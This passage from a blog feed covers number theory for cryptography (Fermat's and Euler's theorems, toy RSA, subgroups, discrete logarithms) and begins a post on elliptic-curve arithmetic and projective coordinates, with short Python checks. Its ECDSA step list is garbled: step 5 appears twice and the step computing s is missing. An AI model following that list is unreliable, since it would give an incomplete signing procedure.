&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $(x+2)\equiv 0 \pmod{12}$. If $x=10$, then $x+2=12\equiv 0$, since it is divisible by 12.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $(x+1)\equiv 0 \pmod{12}$. If $x=11$, then $x+1=12\equiv 0$, since it is divisible by 12.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Let’s pick now $2$ and see what happens:&lt;br &#x2F;&gt;
$(2+2)\times(2+1)=12\equiv 0 \pmod{12}$.&lt;br &#x2F;&gt;
So $2$ is a solution to the equation, but $2+2\equiv 4\not\equiv 0$ and $2+1\equiv 3\not\equiv 0$. This happens because $12$ is not a prime number.&lt;&#x2F;p&gt;
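&lt;p&gt;We can enumerate every solution by brute force. The quick illustrative check below shows that there are actually four solutions modulo $12$, something impossible over a field, where a quadratic equation has at most two roots:&lt;&#x2F;p&gt;

```python
n = 12
# All x in {0, ..., 11} with (x + 2)(x + 1) ≡ 0 (mod 12)
solutions = [x for x in range(n) if ((x + 2) * (x + 1)) % n == 0]
print(solutions)  # [2, 7, 10, 11]; x = 7 also works, since 9 * 8 = 72 = 6 * 12
```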
&lt;p&gt;As a matter of fact, given $a$ and $n$, we have that $a$ has an inverse (modulo $n$) if and only if $gcd(a,n)=1$, that is, $a$ and $n$ are coprime. In the previous example, $3$ is not coprime to $12$ (they have $3$ as a common divisor).&lt;&#x2F;p&gt;
&lt;p&gt;If the set is not too large, we can find inverses just by trial and error. However, it would be nice to have some results that help us compute inverses and how to calculate (integer) powers of numbers.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s focus on a prime number $p$ and take all the non-zero elements of the set, $(\mathbb{Z}&#x2F;p\mathbb{Z})^\star$. Let’s fix $p=7$, so $(\mathbb{Z}&#x2F;p\mathbb{Z})^\star = {1,2,3,4,5,6}$ and let’s focus on multiplication over the set. We can define the power $a^n=a\times a\times a\times …\times a$. Obviously, $1$ is not interesting, because $1^n=1$, so let’s take $5$:&lt;br &#x2F;&gt;
$5^1\equiv 5 \pmod{7}$&lt;br &#x2F;&gt;
$5^2\equiv 4 \pmod{7}$&lt;br &#x2F;&gt;
$5^3\equiv 6 \pmod{7}$&lt;br &#x2F;&gt;
$5^4\equiv 2 \pmod{7}$&lt;br &#x2F;&gt;
$5^5\equiv 3 \pmod{7}$&lt;br &#x2F;&gt;
$5^6\equiv 1 \pmod{7}$&lt;br &#x2F;&gt;
$5^7\equiv 5 \pmod{7}$&lt;br &#x2F;&gt;
$5^8\equiv 4 \pmod{7}$&lt;br &#x2F;&gt;
$5^{13}\equiv 5 \pmod{7}$&lt;br &#x2F;&gt;
We see that the powers of $5$ span all the elements of the group. We also see that the powers repeat themselves with period $6$, that is, $4 \equiv 5^2 \equiv 5^8 \equiv 5^{14} \pmod{7}$, and so on. Let’s look at $3$:&lt;br &#x2F;&gt;
$3^1\equiv 3 \pmod{7}$&lt;br &#x2F;&gt;
$3^2\equiv 2 \pmod{7}$&lt;br &#x2F;&gt;
$3^3\equiv 6 \pmod{7}$&lt;br &#x2F;&gt;
$3^4\equiv 4 \pmod{7}$&lt;br &#x2F;&gt;
$3^5\equiv 5 \pmod{7}$&lt;br &#x2F;&gt;
$3^6\equiv 1 \pmod{7}$&lt;br &#x2F;&gt;
$3^7\equiv 3 \pmod{7}$&lt;br &#x2F;&gt;
We got all the elements (albeit in a different order). Finally, let’s look at $2$:&lt;br &#x2F;&gt;
$2^1\equiv 2 \pmod{7}$&lt;br &#x2F;&gt;
$2^2\equiv 4 \pmod{7}$&lt;br &#x2F;&gt;
$2^3\equiv 1 \pmod{7}$&lt;br &#x2F;&gt;
$2^4\equiv 2 \pmod{7}$&lt;br &#x2F;&gt;
This time we didn’t span all the elements of the group, and the powers started repeating after only $3$ steps. We will show that these results are valid in general (provided we’re working modulo a prime number).&lt;&#x2F;p&gt;
&lt;p&gt;First, we can prove that the set $(\mathbb{Z}&#x2F; p\mathbb{Z})^\star$ together with multiplication forms an abelian group (the product can never give $0$: since $p$ is prime, a product of numbers not divisible by $p$ is itself not divisible by $p$). Second, the group is finite, since the number of elements is finite ($6$ in our example); its order is $6$. We also saw that by repeatedly multiplying $5$ by itself (that is, taking powers of $5$), we can generate all the elements of the group (note that everything repeats after $6$, which is the order of the group). Since the group can be generated by one of its elements, it is a (finite) cyclic group.&lt;&#x2F;p&gt;
&lt;p&gt;For an element $a$, the lowest positive integer $n$ such that $a^n\equiv 1 \pmod{p}$ is known as the order of $a$. The elements of the group with their respective orders in parentheses are: $1 (1)$, $2 (3)$, $3 (6)$, $4 (3)$, $5 (6)$, $6 (2)$. We can see that the order of each element divides the order of the group, $6$. The following theorems show that this is not a coincidence.&lt;&#x2F;p&gt;
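&lt;p&gt;The orders can be computed mechanically from the definition. A short Python sketch (ours, for illustration) for $p=7$, checking along the way that every order divides the group order $6$:&lt;&#x2F;p&gt;

```python
p = 7

def order(a, p):
    """Smallest positive n with a**n ≡ 1 (mod p)."""
    n, x = 1, a % p
    while x != 1:
        x = (x * a) % p
        n += 1
    return n

orders = {a: order(a, p) for a in range(1, p)}
print(orders)  # {1: 1, 2: 3, 3: 6, 4: 3, 5: 6, 6: 2}
assert all((p - 1) % n == 0 for n in orders.values())  # each order divides 6
```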
&lt;h3 id=&quot;three-useful-theorems-and-the-magic-behind-rsa&quot;&gt;Three useful theorems and the magic behind RSA&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fermat%27s_little_theorem&quot;&gt;Fermat’s Little Theorem&lt;&#x2F;a&gt;: If $p$ is prime, then, for any integer $a$ we have that $a^p-a$ is divisible by $p$:&lt;br &#x2F;&gt;
$a^p\equiv a \pmod{p}$.&lt;br &#x2F;&gt;
&lt;em&gt;Exercise: Check that this is indeed valid for all elements of $(\mathbb{Z}&#x2F;7\mathbb{Z})^\star$&lt;&#x2F;em&gt;&lt;br &#x2F;&gt;
If $a$ is coprime to $p$, we can write this equivalently:&lt;br &#x2F;&gt;
$a^{p-1}\equiv 1 \pmod{p}$&lt;br &#x2F;&gt;
An interesting consequence is that we can calculate inverses by computing $a^{-1} \equiv a^{p-2} \pmod{p}$, even though in some cases a smaller exponent already suffices (for example, $6\times 6\equiv 1 \pmod{7}$, so $6^{-1}=6$).&lt;&#x2F;p&gt;
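&lt;p&gt;This gives a practical recipe for computing inverses with fast modular exponentiation. In Python, pow(a, p - 2, p) computes exactly this and, since Python 3.8, pow(a, -1, p) returns the modular inverse directly:&lt;&#x2F;p&gt;

```python
p = 7
for a in range(1, p):
    inv = pow(a, p - 2, p)        # Fermat: a^(p-2) is the inverse of a mod p
    assert (a * inv) % p == 1
    assert inv == pow(a, -1, p)   # built-in modular inverse (Python 3.8+)
print([pow(a, p - 2, p) for a in range(1, p)])  # [1, 4, 5, 2, 3, 6]
```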
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Euler%27s_theorem&quot;&gt;Euler’s theorem&lt;&#x2F;a&gt;: If $a$ and $n$ are positive coprime integers, then $a^{\phi(n)}\equiv 1 \pmod{n}$, where $\phi(n)$ is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Euler%27s_totient_function&quot;&gt;Euler’s phi (or totient) function&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Euler’s $\phi(n)$ function counts the numbers $m &amp;lt; n$ that are coprime to $n$. For example, if we take $n = 5$, the numbers $1,2,3,4$ are all coprime to $5$ and $\phi(5) = 4$ (this is reasonable, since $5$ is prime). If we take $8$, we have ${ 1 , 2 , 3 , 4 , 5 , 6 , 7}$; however, only $1,3,5,7$ are coprime to $8$, so $\phi(8)=4$. For prime numbers, we have&lt;br &#x2F;&gt;
$\phi(p)=p-1$&lt;br &#x2F;&gt;
so, Euler’s theorem gives us Fermat’s theorem as a particular case. Another useful property is that if $m$ and $n$ are relatively prime, then&lt;br &#x2F;&gt;
$\phi(m\times n)=\phi(n)\times \phi(m)$&lt;br &#x2F;&gt;
This shows that $\phi$ is a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Multiplicative_function&quot;&gt;multiplicative function&lt;&#x2F;a&gt;. In particular, if $n$ is the product of two primes, $p$ and $q$, then&lt;br &#x2F;&gt;
$\phi(n) = (p-1)\times (q-1)$&lt;br &#x2F;&gt;
This is the working principle of RSA: the public exponent $e$ and the private exponent $d$ are multiplicative inverses modulo $\phi(n)$,&lt;br &#x2F;&gt;
$d\times e \equiv 1 \pmod{\phi(n)}$&lt;br &#x2F;&gt;
This means that $d\times e = 1+k\phi(n)$ for some integer $k$, so when we compute&lt;br &#x2F;&gt;
$M^{ e \times d } = M^{ 1 + k \phi(n) } = M \times M^{ k \phi(n) } \equiv M \pmod{n}$&lt;br &#x2F;&gt;
since $M^{k \phi(n) } = {(M^{ \phi(n) })}^k \equiv 1^k \pmod{n}$ (provided $M$ is coprime to $n$). Breaking RSA is at most as hard as factoring the number $n$, and over the years the length of the keys has increased significantly (typical keys are now 2048 to 4096 bits); elliptic curves, on the other hand, give the same level of security with much shorter keys.&lt;&#x2F;p&gt;
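&lt;p&gt;The whole RSA cycle can be traced with toy numbers. The sketch below uses the classic textbook primes $p=61$ and $q=53$ (numbers this small are trivially factorable and serve only as an illustration):&lt;&#x2F;p&gt;

```python
p, q = 61, 53
n = p * q                  # 3233, the public modulus
phi = (p - 1) * (q - 1)    # 3120, Euler's totient of n
e = 17                     # public exponent, coprime to phi
d = pow(e, -1, phi)        # private exponent: d*e ≡ 1 (mod phi); gives 2753
assert (d * e) % phi == 1

M = 65                     # a message, with 0 < M < n and M coprime to n
c = pow(M, e, n)           # encryption: c = M^e mod n
assert pow(c, d, n) == M   # decryption recovers M, by Euler's theorem
```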
&lt;h3 id=&quot;subgroups-lagrange-s-theorem&quot;&gt;Subgroups. Lagrange’s theorem&lt;&#x2F;h3&gt;
&lt;p&gt;We saw that the order of $(\mathbb{Z}&#x2F;7\mathbb{Z})^\star$ was $6$ and that for any element $a$ we have $a^6\equiv 1 \pmod{7}$. However, for $2$ we already have $2^3\equiv 1 \pmod{7}$. A subgroup $H$ is a subset of $G$ that is itself a group, that is, it satisfies G1-G4. For example, if we consider the subset $H={1}$, this is a subgroup of order $1$. Why? Because $1\times 1=1$, so the operation is closed, and all other properties follow from the operations of the group $G$. $G$ is also a subgroup of itself. These two are called the trivial subgroups of $G$ (which are not very interesting). The set ${1,2,4}$ is a subgroup of $(\mathbb{Z}&#x2F;7\mathbb{Z})^\star$. To check this, we need to see that the identity belongs to the set, that if an element is in the set, so is its inverse, and that the operation is closed. Let’s check this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $1$ is in the set and $1$ is its own inverse.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The operation is closed, because $2\times 2\equiv 4 \pmod{7}$, because $4\times 4=16\equiv 2 \pmod{7}$ and because $2\times 4=8\equiv 1 \pmod{7}$ (we don&amp;#39;t need to check the products with $1$ since that is obvious). We also checked the inverses, since $4=2^{-1}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The subset ${1,2,4}$ forms a subgroup of order $3$. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lagrange%27s_theorem_(group_theory)&quot;&gt;Lagrange’s theorem&lt;&#x2F;a&gt; states that the order of a subgroup divides the order of the group. We have another subgroup ${1,6}$, which is of order $2$. These are non-trivial subgroups. If the order of a group is prime, then its only subgroups are the trivial subgroups (since $p$ is prime, the subgroups can only be of order $1$ and $p$). A group whose only subgroups are the trivial ones is known as a simple group. For example, $\mathbb{Z}&#x2F;7\mathbb{Z}$ with addition is the group ${0,1,2,3,4,5,6}$ of order $7$. There are no subgroups other than the whole group and ${0}$. Note that the order of each element (other than zero, which has order $1$) is $7$, since $7\times a=a+a+a+a+a+a+a$ is divisible by $7$ and, therefore, congruent to $0$ modulo $7$. The fact that some groups can be broken down into smaller subgroups is of concern when working with elliptic curves: if the group is not of prime order, it can be broken down into smaller groups and an attacker may break the system by performing searches on these subgroups.&lt;&#x2F;p&gt;
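&lt;p&gt;The cyclic subgroups of $(\mathbb{Z}&#x2F;7\mathbb{Z})^\star$ can be listed by brute force, which also lets us check Lagrange’s theorem directly. A small Python sketch (the helper name is ours):&lt;&#x2F;p&gt;

```python
p = 7

def generated_subgroup(a, p):
    """Set of all powers of a modulo p (the cyclic subgroup generated by a)."""
    elements, x = set(), 1
    while x not in elements:
        elements.add(x)
        x = (x * a) % p
    return elements

for a in range(1, p):
    H = generated_subgroup(a, p)
    # Lagrange's theorem: the order of each subgroup divides the group order 6
    assert (p - 1) % len(H) == 0

print(sorted(generated_subgroup(2, p)))  # [1, 2, 4]
print(sorted(generated_subgroup(6, p)))  # [1, 6]
```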
&lt;h3 id=&quot;the-discrete-logarithm-problem&quot;&gt;The discrete logarithm problem&lt;&#x2F;h3&gt;
&lt;p&gt;Given a group, we can apply the operation repeatedly on a point $g$ to get to a point $P$, that is, $g^k=g\times g\times g\times … \times g=P$. For example, in $(\mathbb{Z}&#x2F;7\mathbb{Z})^\star$, $5$ generates all the elements by successive multiplications with itself. We could then ask how many times $x$ we should multiply $5$ by itself to get to $3$, that is, $5^x\equiv 3 \pmod{7}$. Since we know that the order of the group is $6$, we only need to concern ourselves with the numbers $0-6$. If we look above or try all combinations, $5^5\equiv 3 \pmod{7}$, so $x=5$. Similarly, if we look for $y$ such that $5^y\equiv 4 \pmod{7}$, we get $y=2$. The problem of finding $k$ such that $g^k=P$ is known as the discrete logarithm problem (in number theory, $x$ and $y$ are known as indices). We quickly see that this logarithm works quite differently from the common logarithm on the real numbers (though the idea is the same: given $y$, find $x$ such that $e^x=y$). There is no obvious pattern, it is not increasing, and if we had to search over a large set, it could be really daunting. Many cryptographic systems rely on the hardness of this problem over a finite cyclic group.&lt;&#x2F;p&gt;
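&lt;p&gt;For a group this small, the discrete logarithm can be solved by exhaustive search, which is precisely what becomes infeasible at cryptographic sizes. A minimal Python sketch (the function name is ours):&lt;&#x2F;p&gt;

```python
def dlog(g, P, p):
    """Brute-force discrete log: find x with g^x ≡ P (mod p), or None."""
    x, acc = 0, 1
    while x < p:               # the group order bounds the search
        if acc == P % p:
            return x
        acc = (acc * g) % p
        x += 1
    return None

print(dlog(5, 3, 7))  # 5, since 5^5 ≡ 3 (mod 7)
print(dlog(5, 4, 7))  # 2, since 5^2 ≡ 4 (mod 7)
```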
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;We presented some basic terms and concepts from number theory and algebra that will be useful when reading about cryptography, since many key concepts and strategies rely on math. The notions of groups, rings, fields, and prime numbers show up almost all the time. Soon we will continue with other important tools and concepts that will help us understand how elliptic curve cryptography works, how to perform faster operations over groups, and how to combine elliptic curves to build zk-SNARKs.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Need for speed: Elliptic curves chapter</title>
          <pubDate>Fri, 12 Aug 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/need-for-speed-elliptic-curves-chapter/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/need-for-speed-elliptic-curves-chapter/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/need-for-speed-elliptic-curves-chapter/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Elliptic curves (EC) have gained widespread acceptance as tools for cryptography. They offer several advantages over other methods, such as RSA, providing equal levels of security with shorter keys (for example, 228-bit keys in EC cryptography are as good as 2300-bit RSA keys). This represents an advantage, since more and more cryptography is done on smartphones, which are less powerful than computers. These are curves defined by the equation $y^2 = x^3 + ax + b$ over some &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Field_(mathematics)&quot;&gt;field&lt;&#x2F;a&gt; (for example, the real numbers). Their shape depends on $a$ and $b$, but they look more or less like the following picture:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;rk6M8y0.jpg&quot; alt=&quot;An elliptic curve over the real numbers&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In cryptography, we are not interested in curves defined over the real numbers. We work with them over some finite field $\mathcal{F_p}$ (that is, a set with a finite number of elements, such as $53$, $101$ or $2^{255}-19$), because that gives us a mathematical structure (a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Finite_group&quot;&gt;finite group&lt;&#x2F;a&gt;) which is very convenient. The curve looks like scattered points with no clear pattern over a finite field:&lt;br &#x2F;&gt;
&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;sQDajke.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Elliptic curves play a role in key exchange when connecting via SSH to a server or to prove ownership in bitcoin. They also appear when performing digital signatures, generating random numbers (though there have been some problems) and they are useful even to factor numbers (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lenstra_elliptic-curve_factorization&quot;&gt;Lenstra’s algorithm&lt;&#x2F;a&gt;). For example, in the elliptic curve digital signature algorithm (ECDSA) you have these steps (don’t worry if you do not understand all the terms now, we will cover them one by one afterwards):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Calculate E=hash(message), where hash is a secure [hash function](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Hash_function).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Take $Z$ equal to the $L_n$ leftmost bits of E, where $L_n$ is the bit length of the group order $n$ (that is, $n$ is the number of elements making up the group).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Select a cryptographically secure random number $k$ (never use the same $k$ twice or you&amp;#39;ll be revealing your key).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Evaluate $(x_1,y_1)=kg$, where $g$ is the generator of the group.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Let $r=x_1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Let $r=x_1 \pmod{n}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. The signature is the pair $(r,s)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this example, we have to evaluate in step 4 an addition on the curve to arrive at point $(x_1,y_1)$, which gives us $r$. In general, $k$ is a large number (having 256 bits, for example), so that operation can be quite expensive. Besides, if the implementation is not done properly, elliptic curve cryptography could be targeted by side-channel attacks, such as timing and cache attacks. Some elliptic curves have properties that allow for a constant-time implementation, which makes them resistant to these strategies.&lt;&#x2F;p&gt;
&lt;p&gt;Elliptic curves also appear in zk-SNARKs (zero-knowledge succinct non-interactive arguments of knowledge; we’ll go hunting for the SNARK in another post) to provide homomorphic hiding. The word sounds important, but the idea behind it is simple. Suppose that there are two variables, $x$ and $y$, and you want (or need) to know $x+y$. The problem is, you don’t know them directly, but you have their encrypted form $E(x)$ and $E(y)$. If you have homomorphic hiding, you can compute $E(x+y)=E(x)\times E(y)$, where $\times$ is the operation over the encrypted variables. So, even if you don’t know the variables themselves, you can perform mathematical operations on them (and luckily, that’s just what you need). This is achieved in practice by means of two elliptic curves (known as a pairing; not all elliptic curves are that sociable or get along quite well with others). To be a good match, we need the operations to be performed as quickly as possible (among other things). A simple example is the exponential function, $f: \mathbb{R} \rightarrow \mathbb{R}^+&#x2F; f(x)=\exp(x)$. If you have $x=2.303$, $\exp(2.303)\approx 10$, $y=3$, $\exp(3)\approx 20.09$, then $\exp(x+y)=\exp(x)\exp(y)=10\times 20.09=200.9$, which is equal to $\exp(5.303)$ and $x+y=5.303$. Of course, in this case it is very easy to go back and know the exact numbers $x$, $y$ and $x+y$; in the case of elliptic curves, this is very hard, owing to the particular group structure.&lt;&#x2F;p&gt;
&lt;p&gt;To be able to work with elliptic curves, we need to define an operation involving the points on the curve. We can do this using the chord-and-tangent construction: given two points on the curve, we can draw a line connecting them; the line intersects the curve at a third point and we reflect it around the $x$-axis to obtain the sum (remember the picture of the curve defined over real numbers). The formulae are&lt;br &#x2F;&gt;
$s=\frac{y_2-y_1}{x_2-x_1}$&lt;br &#x2F;&gt;
$x_3=s^2-x_1-x_2$&lt;br &#x2F;&gt;
$y_3=s(x_1-x_3)-y_1$&lt;&#x2F;p&gt;
&lt;p&gt;There are some special cases, such as when we want to add a point to itself (we call that “doubling”). To make things work, we need to add a special point $\mathcal{O}$, the point at infinity. The curve, together with the operation, form a finite cyclic group. In simple words, every time we add two points we get a third one which belongs to the curve (it is closed under the operation). We also have an identity point (the point at infinity: $P+\mathcal{O}=P$) and each point $P$ has an inverse $P^\prime$, such that $P+P^\prime=\mathcal{O}$. Moreover, the elements of the group can be generated by repeatedly adding a point $g$ (the generator) to itself. In other words, for $P$ in the group, there is some $k$ such that $kg=P$. If we are given $k$, we can quickly calculate $P$, but doing the operation the other way around (that is, given $P$, find $k$) can be very difficult (this is known as the discrete logarithm problem) and we used this idea in a previous paragraph.&lt;&#x2F;p&gt;
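&lt;p&gt;The chord-and-tangent rule fits in a few lines of code. The Python sketch below works over the toy curve $y^2 = x^3 + 2x + 2$ over $\mathbb{F}_{17}$ (a standard textbook example, chosen purely for illustration), representing the point at infinity $\mathcal{O}$ as None:&lt;&#x2F;p&gt;

```python
# Toy curve y^2 = x^3 + a*x + b over F_p, with a = 2, b = 2, p = 17.
a, p = 2, 17

def ec_add(P, Q):
    """Chord-and-tangent addition; the point at infinity O is None."""
    if P is None:
        return Q
    if Q is None:
        return P
    x1, y1 = P
    x2, y2 = Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                                  # P + (-P) = O
    if P == Q:
        s = (3 * x1 * x1 + a) * pow(2 * y1, -1, p)   # tangent slope (doubling)
    else:
        s = (y2 - y1) * pow(x2 - x1, -1, p)          # chord slope
    s %= p
    x3 = (s * s - x1 - x2) % p
    y3 = (s * (x1 - x3) - y1) % p
    return x3, y3

def ec_mul(k, P):
    """Compute k*P by repeated addition (fine for a toy example)."""
    R = None
    for _ in range(k):
        R = ec_add(R, P)
    return R

G = (5, 1)
print(ec_add(G, G))   # doubling: (6, 3)
print(ec_mul(19, G))  # None: the order of G is 19, so 19*G = O
```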
&lt;p&gt;All these calculations are done with the operations of the finite field $\mathcal{F}_p$. We see that, at each addition step, we have to calculate the slope of the line, which involves a division on elements of the finite field. This can be rewritten as $s=(x_2-x_1)^{-1}(y_2-y_1)$, where $(x_2-x_1)^{-1}=b$ is the multiplicative inverse of $x_2-x_1$. In simpler form, $b(x_2-x_1)\equiv 1 \pmod{p}$ (when we write $a \equiv b \pmod{p}$, we mean that there is some integer $q$ such that $a=pq+b$; it is read “$a$ is congruent to $b$ modulo $p$”). Computing inverses is possible, but considerably more expensive than multiplications. There is a result from number theory called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fermat%27s_little_theorem&quot;&gt;Fermat’s little theorem&lt;&#x2F;a&gt;, which tells us that $a^{p-1}\equiv 1 \pmod{p}$ if $a$ and $p$ have no common divisors other than 1 (we say $a$ and $p$ are coprime). We can write this in a different fashion,&lt;&#x2F;p&gt;
&lt;p&gt;$a^{p-2}a\equiv 1 \pmod{p}$&lt;&#x2F;p&gt;
&lt;p&gt;and we see that $b=a^{p-2}$ (we can make things simple and then reduce $b$ to $a^{p-2} \pmod{p}$). So, to get the multiplicative inverse, we have to perform many multiplications. (Sometimes it is much easier. Let’s take $p=5$ and we try to find $4^{-1}$. We can see that if we do $4\times 4=16 \equiv 1 \pmod{5}$, so $4^{-1}=4$. This is rather strange, but we have to remember that operations on the finite field have a different behavior). As a matter of fact, $p-1$ gives an upper bound to the power $n$ we have to apply to a field element $a$ to get its inverse, that is $a^n \equiv 1 \pmod{p}$. We call the lowest (positive) exponent $n$ such that $a^n \equiv 1 \pmod{p}$ the order of the element. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lagrange%27s_theorem_(group_theory)&quot;&gt;Lagrange’s Theorem&lt;&#x2F;a&gt; says that the order $n$ divides $p-1$. For example, take $p=7$, so $p-1=6$. We see that $4^3=64\equiv 1 \pmod{7}$, so $4^2\equiv 2 \pmod{7}$ is the inverse of $4$ ($2\times 4=8 \equiv 1 \pmod{7}$). In the same way, $2^3\equiv 1 \pmod{7}$. In the case of $3$, $3^6 \equiv 1 \pmod{7}$ and $3^5 \equiv 5 \pmod{7}$ and we also have $5^6 \equiv 1 \pmod{7}$. So, we see that the orders $n$ are among the divisors of $p-1=6$.&lt;&#x2F;p&gt;
&lt;p&gt;So, even if the equations for point addition over elliptic curves look really simple, they involve many calculations and these may be expensive. If every time we want to add two points, we have to find the multiplicative inverse modulo a large prime, we see that we are paying a high price. There are a couple of tricks we can perform, such as transforming the curve, to gain a lot of speed or avoid some other issues, such as side-channel attacks.&lt;&#x2F;p&gt;
&lt;p&gt;If you are one of those not willing to pay the cost of finding inverses and saving some time or just love speed for the sake of it, then the next section is for you.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;projective-coordinates&quot;&gt;Projective coordinates&lt;&#x2F;h2&gt;
&lt;p&gt;We can save ourselves from costly inversions if we move from our nice two-dimensional space to a three-dimensional space. This idea was introduced by Möbius and also helps us represent the point at infinity properly. We can map our points from our elliptic curve $(x,y)$ to points in projective space $(X,Y,Z)$ as $(x,y) \rightarrow (X=x,Y=y,Z=1)$ and $\mathcal{O} \rightarrow (0,1,0)$. We can go back using the transformation $(X,Y,Z) \rightarrow (x=X&#x2F;Z,y=Y&#x2F;Z)$, except for the point at infinity, where the map is ill-defined. We can visualize this process with the following picture, where we take three points from an elliptic curve and transform them to 3-d.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;zmlMAg9.jpg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We can think of this as transforming our 2-d points to lines passing through the origin in 3-d space. For example, the point $(x_1,y_1)$ in 2-d transforms to the line $(\mu x_1,\mu y_1, \mu)$ with $\mu$ an element in the field. Thus, two points $P_1=(X_1,Y_1,Z_1)$ and $P_2=(X_2,Y_2,Z_2)$ are the same in 2-d (more precisely, are congruent) if we can find $\eta$ such that $(\eta X_1,\eta Y_1,\eta Z_1)=(X_2,Y_2,Z_2)$. These lines do not contain the origin $(0,0,0)$. It is usual to write points in projective space as $(X:Y:Z)$, instead of $(X,Y,Z)$. In our picture, the point A (yellow) gets mapped to the point D (red above it). All the points that lie on the same straight line passing through the origin and D (pink dashed) are considered equivalent to D. Similarly, point B (blue) is mapped to point F (light blue) and all the points on the light green dotted line (except the origin) are equivalent to F. When we add points in this space, the components $(X,Y,Z)$ will change, but we can go back to the point belonging to the curve by just retracing our steps to $Z=1$ along the line that passes through the origin. Why go to all this trouble? We will shortly see that we avoid inversions at each addition step and do just one at the end, when recovering the point in 2-d (for example, when we need to find $r=x_1$ in ECDSA). Of course, if we have to do $P=2g$ we didn’t gain anything, but if we have to perform $P=kg$ with $k$ in the order of 256 bits, we saved many costly inversions.&lt;&#x2F;p&gt;
&lt;p&gt;Making the substitutions into the elliptic curve equation&lt;br &#x2F;&gt;
$$\left(\frac{Y}{Z}\right)^2 = \left(\frac{X}{Z}\right)^3 + a\left(\frac{X}{Z}\right) + b$$&lt;br &#x2F;&gt;
We can multiply by $Z^3$ and get the equation&lt;br &#x2F;&gt;
$$ZY^2 = X^3 + aXZ^2 + bZ^3$$&lt;br &#x2F;&gt;
